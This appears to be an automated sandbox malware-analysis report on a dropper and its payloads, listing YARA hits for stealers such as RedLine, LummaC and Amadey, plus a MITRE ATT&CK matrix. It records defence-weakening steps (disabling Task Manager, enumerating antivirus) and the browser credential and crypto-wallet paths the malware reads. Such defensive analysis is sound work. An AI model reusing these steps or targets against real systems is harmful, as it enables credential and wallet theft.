Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 2_2_00D0CAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

2_2_00D0CAED

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000DB0A0 GetUserNameA,

9_2_000DB0A0

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_001123B7 _free,_free,_free,GetTimeZoneInformation,_free,

9_2_001123B7

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000D7CE0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

9_2_000D7CE0

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\System32\reg.exe

Registry value created: DisableTaskMgr 1

Disables the Windows task manager (taskmgr)

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Modifies power options to not sleep / hibernate

Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: ama.exe, 00000004.00000002.2402846239.000000000590F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.2.Hkbsse.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.NewLatest.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.Hkbsse.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.Hkbsse.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.NewLatest.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Hkbsse.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hsRju5CPK2.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2050132047.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2055170798.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2181187117.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2191932184.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2014834616.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2176704123.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2053395670.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2095100146.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2162518369.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2253029783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2422340498.0000000000CF5000.00000004.00000001.01000000.00000011.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gold.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ama.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.2084249217.0000000000352000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4488518104.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ama.exe PID: 6200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gold.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR]q
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
Source: ama.exe, 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: legs.exe, 00000015.00000002.2422340498.0000000000CF5000.00000004.00000001.01000000.00000011.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2393678580.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ama.exe PID: 6200, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2253029783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2422340498.0000000000CF5000.00000004.00000001.01000000.00000011.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gold.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ama.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.2084249217.0000000000352000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4488518104.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ama.exe PID: 6200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gold.exe PID: 3608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000FEB58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	9_2_000FEB58
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000FDE61 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	9_2_000FDE61
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00B92340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	11_2_00B92340
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BBEB58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	11_2_00BBEB58
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BBDE61 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	11_2_00BBDE61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 Windows Service	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	412 Process Injection	4 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	13 Software Packing	NTDS	348 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	10101 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	481 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	481 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hsRju5CPK2.exe	55%	Virustotal		Browse
hsRju5CPK2.exe	46%	ReversingLabs	Win32.Trojan.Generic
hsRju5CPK2.exe	100%	Avira	TR/Crypt.TPM.Gen
hsRju5CPK2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\6.exe	100%	Avira	HEUR/AGEN.1313486
C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\8.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000014001\1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe	100%	Joe Sandbox ML
C:\ProgramData\wikombernizc\reakuqnanrkn.exe	82%	ReversingLabs	Win32.Trojan.Generic
